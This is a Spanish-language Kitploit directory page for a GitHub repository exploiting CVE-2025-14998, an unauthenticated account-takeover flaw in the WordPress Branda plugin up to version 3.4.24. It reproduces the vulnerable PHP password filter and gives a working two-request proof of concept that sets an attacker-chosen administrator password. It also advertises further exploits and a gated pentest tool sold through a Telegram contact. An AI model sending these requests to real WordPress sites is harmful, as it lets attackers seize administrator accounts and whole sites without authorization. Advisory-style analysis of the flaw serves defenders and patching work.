Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-14998 — CVE-2025-14998 Plugin de Wordpress - Branda – White Label & Branding, Free Login Page Customizer <= 3.4.24 - Escalada de Privilegios no Autenticada mediante Secuestro de Cuenta | Kitploit
Herramientas/GitHubGitHub/ktn1990/cve-2025-14998
Ataques de ContraseñasAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAutenticación
GitHubktn1990/cve-2025-14998

CVE-2025-14998

CVE-2025-14998 Plugin de Wordpress - Branda – White Label & Branding, Free Login Page Customizer <= 3.4.24 - Escalada de Privilegios no Autenticada mediante Secuestro de Cuenta

Ver Repositorio
22hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Wordpress Branda – White Label y Branding, Personalizador gratuito de página de inicio de sesión <= 3.4.24 - Escalada de privilegios no autenticada mediante apropiación de cuenta

CVE-2025-14998 El plugin Branda para WordPress es vulnerable a la escalada de privilegios mediante apropiación de cuenta en todas las versiones hasta la 3.4.24 inclusive. Esto se debe a que el plugin no valida correctamente la identidad de un usuario antes de actualizar su contraseña. Esto permite que atacantes no autenticados cambien contraseñas arbitrarias de usuarios, incluidos administradores, y aprovechen eso para obtener acceso a su cuenta.

Para más vulnerabilidades de WordPress y herramientas exclusivas de pentesting, contáctame en Telegram @KtN1990.

🔍 Análisis de causa raíz

El plugin anula la lógica de generación de contraseñas de WordPress al engancharse en el filtro random_password. En lugar de permitir que WordPress genere una contraseña aleatoria segura, el plugin la reemplaza con una entrada controlada por el usuario.

Código vulnerable

root@kitploit:~
public function password_random_password_filter( $password ) {
    global $wpdb, $signup_password_use_encryption;

    if ( isset( $_GET['key'] ) && ! empty( $_GET['key'] ) ) {
        $key = $_GET['key'];
    } elseif ( isset( $_POST['key'] ) && ! empty( $_POST['key'] ) ) {
        $key = $_POST['key'];
    }

    if ( ! empty( $_POST['password_1'] ) ) {
        $password = $_POST['password_1'];
    } elseif ( ! empty( $key ) ) {
        $signup = $wpdb->get_row(
            $wpdb->prepare(
                "SELECT * FROM $wpdb->signups WHERE activation_key = '%s'",
                $key
            )
        );

        if ( ! ( empty( $signup ) || $signup->active ) ) {
            $meta = maybe_unserialize( $signup->meta );

            if ( ! empty( $meta['password'] ) ) {
                if ( 'yes' === $signup_password_use_encryption ) {
                    $password = $this->password_decrypt( $meta['password'] );
                } else {
                    $password = $meta['password'];
                }
            }
        }
    }

    return $password;
}

🧪 Prueba de concepto (Sanitizada)

Paso 1 — Activar restablecimiento de contraseña con contraseña arbitraria

root@kitploit:~
POST /wp/wp-login.php?action=lostpassword HTTP/1.1
Host: example.local
Content-Type: application/x-www-form-urlencoded

user_login=admin&
redirect_to=&
password_1=EfUSmvnTun5XbvE6RvIB&
wp-submit=Get+New+Password

El valor de password_1 puede ser cualquier cadena controlada por el atacante.


Paso 2 — Completar el restablecimiento usando el mismo valor como clave de restablecimiento

root@kitploit:~
GET /wp/wp-login.php?login=admin&key=EfUSmvnTun5XbvE6RvIB&action=rp HTTP/1.1
Host: example.local

✅ Resultado

  • WordPress acepta la contraseña controlada por el atacante
  • La contraseña del administrador se cambia
  • El atacante puede autenticarse como el usuario afectado

No se requiere acceso a correo electrónico ni un token de restablecimiento de contraseña válido.


💥 Impacto

Un atacante no autenticado puede:

  • Restablecer contraseñas de cualquier usuario de WordPress
  • Tomar el control de cuentas de administrador
  • Obtener control total de la instalación de WordPress
  • Modificar plugins, temas o contenido

Contacto

  • @KtN1990

Más vulnerabilidades, ¡Revisa Megatron!

Logo

  • 💣 ¿Qué es Megatron? Megatron es una herramienta avanzada de pruebas de penetración diseñada para testers serios y equipos rojos. Ya sea que estés auditando, escaneando o probando infraestructuras, Megatron te brinda el poder que necesitas.

-🛡️ Ideal para:

  • Investigadores de seguridad

  • Probadores de penetración

  • Hackers éticos

  • 📦 Línea mantenida con ~230 módulos de investigación heredados; mejoras recientes en el núcleo del escáner para estabilidad y detección.

  • 🎯 Propósito: Proporcionado estrictamente para pruebas de seguridad autorizadas, educación, investigación defensiva y entrenamiento de equipos rojos. Esta versión no es para uso ilegal. La distribución está restringida: acceso solo después de verificación y un Acuerdo de Uso Responsable / NDA firmado.

-🛡 Política de acceso responsable (resumen):

  1. Acceso solo a profesionales de seguridad verificados, equipos de seguridad corporativos, laboratorios acreditados o proveedores de capacitación.
  2. Debes proporcionar nombre de la organización, cargo, correo electrónico oficial (corporativo) y propósito legal.
  3. Descarga completa concedida solo después de verificación y firma de nuestro Acuerdo de Uso Responsable / NDA.
  4. Tolerancia cero al mal uso: la evidencia de uso malicioso resulta en revocación y denuncia cuando sea requerido.
  • 📩 Contacto / Solicitudes / Verificación: @KtN1990 — incluye organización, cargo y breve motivo de acceso. Canal de Telegram

Demo

IMAGE ALT TEXT HERE

Licencia

MIT

Descargar herramienta